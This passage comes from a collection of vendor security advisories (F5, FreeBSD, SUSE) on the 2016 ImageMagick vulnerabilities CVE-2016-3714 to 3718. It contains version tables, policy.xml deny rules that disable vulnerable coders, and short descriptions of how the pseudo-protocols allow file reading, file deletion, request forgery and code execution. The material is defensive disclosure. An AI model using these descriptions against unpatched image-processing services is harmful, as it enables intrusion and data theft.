not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /&gt;\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-10T09:23:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3714", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-03-17T20:53:00", "id": "F5:K03151140", "href": "https://support.f5.com/csp/article/K03151140", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:49", "description": "\nF5 Product Development has assigned ID 591894 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H10550253 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action**: Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coders listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:44:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3715", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T00:30:00", "id": "F5:K10550253", "href": "https://support.f5.com/csp/article/K10550253", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T21:07:47", "description": "\nF5 Product Development has assigned ID 591918 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H61974123 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | None | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /&gt; \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:43:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3718", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T20:36:00", "id": "F5:K61974123", "href": "https://support.f5.com/csp/article/K61974123", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:43", "description": "\nF5 Product Development has assigned ID 591881 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H25102203 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, the vulnerable coders listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n&lt;policymap&gt; \n&lt;policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /&gt; \n&lt;/policymap&gt;\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:44:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3716", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T00:40:00", "id": "F5:K25102203", "href": "https://support.f5.com/csp/article/K25102203", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nOpenwall reports:\n\nInsufficient filtering for filename passed to delegate's command\n\t allows remote code execution during conversion of several file\n\t formats. Any service which uses ImageMagick to process user\n\t supplied images and uses default delegates.xml / policy.xml,\n\t may be vulnerable to this issue.\nIt is possible to make ImageMagick perform a HTTP GET or FTP\n\t request\nIt is possible to delete files by using ImageMagick's 'ephemeral'\n\t pseudo protocol which deletes files after reading.\nIt is possible to move image files to file with any extension\n\t in any folder by using ImageMagick's 'msl' pseudo protocol.\n\t msl.txt and image.gif should exist in known location - /tmp/\n\t for PoC (in real life it may be web service written in PHP,\n\t which allows to upload raw txt files and process images with\n\t ImageMagick).\nIt is possible to get content of the files from the server\n\t by using ImageMagick's 'label' pseudo protocol.\n\n\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-03T00:00:00", "type": "freebsd", "title": "ImageMagick -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-07T00:00:00", "id": "0D724B05-687F-4527-9C03-AF34D3B094EC", "href": "https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2021-06-08T18:38:55", "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing &quot;/etc/ImageMagick-*/policy.xml&quot; (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n", "cvss3": {}, "published": "2016-05-07T13:08:32", "type": "suse", "title": "Security update for ImageMagick (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-07T13:08:32", "id": "SUSE-SU-2016:1260-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00024.html", "cvss": {"score": 10.0, "vector": 